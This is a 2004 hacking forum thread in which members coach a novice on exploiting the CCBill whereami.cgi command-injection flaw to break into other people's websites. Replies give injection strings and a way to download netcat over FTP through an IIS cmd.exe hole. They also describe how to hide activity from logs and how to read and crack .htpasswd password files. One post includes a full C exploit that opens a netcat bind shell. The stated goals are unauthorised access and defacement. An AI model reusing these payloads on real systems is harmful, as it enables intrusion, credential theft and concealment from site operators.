Forums: /cgi-bin/whereami.cgi?g=ls - Help With This - Forums

Jump to content

  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

/cgi-bin/whereami.cgi?g=ls - Help With This What can I do

#1 User is offline   rUn-gUn 

  • Private
  • Icon
  • Group: Members
  • Posts: 8
  • Joined: 11-August 03

Posted 18 May 2004 - 03:37 PM

Hey guys , Im fairly new to exploiting and such, what can I do when I get access to this page

/cgi-bin/whereami.cgi?g=ls

On a website.... It says like DUMP OF Environment Variables and shows all this info about the site/server

I heard you can execute shell commands somehow, Anyone know about this?
0

#2 Guest_atomix_*

  • Group: Guests

Posted 18 May 2004 - 04:15 PM

vuln is old as shit... im sure you can do it like this:

cgi-bin/whereami.cgi?g=|ls|

or
cgi-bin/whereami.cgi?g=|`ls`|
0

#3 User is offline   rUn-gUn 

  • Private
  • Icon
  • Group: Members
  • Posts: 8
  • Joined: 11-August 03

Posted 18 May 2004 - 04:18 PM

yea but what does it do
0

#4 Guest_rapt0r_*

  • Group: Guests

Posted 18 May 2004 - 05:58 PM

I believe this is used to run commands sort of like SQL Injection techniques. Is that what you are trying to do?
0

#5 User is offline   rUn-gUn 

  • Private
  • Icon
  • Group: Members
  • Posts: 8
  • Joined: 11-August 03

Posted 18 May 2004 - 06:15 PM

Well im just trying to gain access to the site thru this exploit... but im not sure how I run commands with it , and which commands to run..
0

#6 User is offline   Blackknight 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 129
  • Joined: 22-September 03

Posted 18 May 2004 - 07:24 PM

Your trying to hack the page.. yay for you

But for learning purposes the whole point is to get past the filters and execute a command the command most likely being a unix command ls is like dir for windows etc
From there you can send a reverse shell to your box and try a local root attempt.
But if you just want to deface the site.. then u can do that with the reverse shell..
i won't go into details you can do some research :blink:
0

#7 User is offline   setthesun 

  • Master Sergeant
  • Icon
  • Group: Specialist
  • Posts: 574
  • Joined: 13-February 04

Posted 18 May 2004 - 09:21 PM

Put a pipe and execute commands in bash. Of course you have to know unix.

setthesun me = new setthesun();
0

#8 User is offline   fizzik 

  • Private
  • Icon
  • Group: Members
  • Posts: 10
  • Joined: 13-March 04

Posted 18 May 2004 - 11:35 PM

atomix is right, the exploit is old as shit. having said that, you will VERY occasionally find them. whereami.cgi?g=commands . It is a ccbill script by the way.
0

#9 User is offline   EXPLOiTED 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 19 May 2004 - 08:28 PM

Well... You dont necessarily need to know UNiX... im not talking about this specific question of /cgi-bin/whereami.cgi?g=ls i found a hole in another site, where i need to gain shell back to fix something... and i scanned... found "CGi holes"... such as:


/scripts/cmd.exe?/c+dir%20c:\

Now when i exec that, i see the dir of C:\... But i cant seem to do anything else, (ie FTP, mkdir, net start) and i was wondering if there were any possible way to gain a shell from this... Any insights?
0

#10 User is offline   brainbuster 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 119
  • Joined: 20-February 04

Posted 20 May 2004 - 12:54 AM

you could do ..

/scripts/cmd.exe?/c+echo open 123.123.123.123>ftp.bat

/scripts/cmd.exe?/c+echo username >ftp.bat

/scripts/cmd.exe?/c+echo password>ftp.bat

/scripts/cmd.exe?/c+echo get nc.exe>ftp.bat

then you run :

/scripts/cmd.exe?/c+ftp -s:ftp.bat

and voila nc.exe is downloaded :-)
0

#11 User is offline   EXPLOiTED 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 20 May 2004 - 07:26 AM

It seems as tho i can only use "DiR"... I will search around and find a text that i can possibly open, maybe get a login / pw for telnet, and fix my problem :\. Thanks for the help


EXPLOiTED
0

#12 User is offline   DJVandal 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 81
  • Joined: 23-September 03

Posted 04 June 2004 - 02:38 AM

rUn-gUn, on May 19 2004, 02:15 AM, said:

Well im just trying to gain access to the site thru this exploit... but im not sure how I run commands with it , and which commands to run..

ok so i am assumeing this is a porn site :) my specialty

This script is old but has been renamed alot of times also to glocation.cgi and a couple of other names any how you want acces to the site right so you need a password

try g=locate */.htpasswd
g=locate *.passwd

and such also try replaceing locate with find

once you have found the htpasswd file use
g=cat /usr/www/pornosite.com/cgi-bin/.htpasswd

of course useing the real path to the passfile instead you will now most likely have a list of usernames and DES encrypted pass's there are many programs out there to decrypt DES and it is not a hard encryption to crack
0

#13 User is offline   lee 

  • Private
  • Icon
  • Group: Members
  • Posts: 12
  • Joined: 21-December 03

Posted 04 June 2004 - 04:24 AM

If you can only DIR, but not exec try to copy the cmd.exe to another one and use this one... by the way all your activity with cmd.exe will be logged...

/scripts/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+low.exe
/scripts/low.exe?/c+........................

the commands you run with low.exe are not logged... and should have exec access...
0

#14 Guest_saendler_*

  • Group: Guests

Posted 04 June 2004 - 04:28 AM

it is an old sploit, but test it....

/*
* =====================================
* CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
* By: Knight420
* 7/07/03
*
* spawns a shell with netcat and attempts to connect
* into the server on port 6666 to gain access of the
* webserver uid
*
* © COPYRIGHT Blue Ballz , 2003
* all rights reserved
* =====================================
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);

unsigned char ccbill[] =
"GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";

int
main (int argc, char **argv)
{
int socket;
char *TARGET = "TARGET";
char *server;
unsigned short int port;
struct sockaddr_in sa;

if (argc != 3) {
system("clear");
printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
"usage: %s <host> <port>\n");
exit (EXIT_FAILURE);
}
setenv (TARGET, argv[1], 1);
server = argv[1];
port = atoi (argv[2]);

socket = net_connect (&sa, server, port, 35);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}

write (socket, ccbill, strlen (ccbill));
sleep (1);
close (socket);

printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
printf ("[1] evil data sent.\n", server);
printf ("[2] connecting to shell.\n", server);
system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
exit (EXIT_SUCCESS);
}

unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;

i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}

return (i);
}


int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;

/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);

cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}

flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}

error = 0;

n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;

FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;

n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);

if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);

return (fd);
}
0

#15 User is offline   D3ADLiN3 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 111
  • Joined: 13-December 03

Posted 04 June 2004 - 06:15 AM

that exploit aint a lot of good id the server hasnt got netcat on it :P

also I doubt you can deface the website since the webscript would be under apache user and would have jack all rights
0
  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

2 User(s) are reading this topic
0 members, 2 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting